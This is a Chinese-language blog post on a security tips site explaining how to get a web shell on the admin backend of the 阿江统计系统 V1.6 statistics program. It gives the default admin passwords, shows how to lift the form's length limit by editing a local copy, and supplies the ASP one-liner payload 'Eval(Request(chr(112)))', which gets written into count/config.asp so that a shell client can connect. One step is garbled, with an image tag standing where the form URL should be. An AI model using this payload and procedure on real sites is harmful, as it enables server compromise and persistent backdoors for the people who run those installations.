阿江统计系统V1.6后台拿SHELL的方法
网络安全 2021-07-03 09:40www.168986.cn网络安全知识
无奈到了自己这里今天下午又碰到个一样的站 纠结···
不多说了 感谢小帆同学 猪猪同学对程序代码的分析·(我自己硬是整了半个小时没整出来利用方法·)
此后台默认的账号密码是 admin admin , ITlearner ITlearner
先进后台
来到修改配置界面 保存源文件到本地
本地打开源文件 找到原文章访问量 把maxlength="10 修改为 maxlength="100 下边是修改后的截图
然后在本地文件修改action地址 例如IE 中的提交地址是upload/2011/1/201101071923425208.jpg" width="581" onload="resizepic(this)" height="50" alt="" />
然后保存文件 用IE 打开 在网站访问量地址后写入 0:Eval(Request(chr(112)))
这个一句话的密码是P 点击修改 一句话就被插到了 count/config.asp 这个文件了 打开一句话客户端就可以连接了
只是个自己积累的小小的过程 对于网上关于阿江统计拿SHELL的方法我也测试了很多 没几个能成功的 所以专门写了这个文章出来 其实就是本地修改下字节 因为源程序中限制了写入的字节数 没有什么技术含量 不要骂我···
网络营销师培训【狼蚁】冰鱼
上一篇:3389无法连接的5种原因分析
下一篇:添加SHIFT后门又一法 学习如何查找后门
网络安全培训
- 网络安全带来的危害 网络安全的弊处
- 如何加强网络安全防范
- 网络安全防护知识内容摘要
- 什么网络安全指的是什么 网络安全指的是什么意
- 网络安全十大公司排名 网络安全十大公司排名绿
- 手机网络安全警示格言 手机网络安全警示教育片
- 网络安全培训心得体会 网络安全知识培训
- 如何树立正确的网络意识 怎么样正确对待网络
- 网络安全大赛是什么意思 网络安全大赛比赛规则
- 世界网络安全公司排名 世界十大网络安全上市公
- 网络安全注意事项知识 网络安全注意事项知识短
- 网络安全常识十条口诀 小学生安全十句话
- 网络安全等级保护三级 网络安全三级等保标准
- 如何增强网络安全防范意识 如何增强网络安全防
- 网络安全注意事项有哪些 网络安全应注意事项
- 网络安全培训感悟 网络安全培训后的收获和感想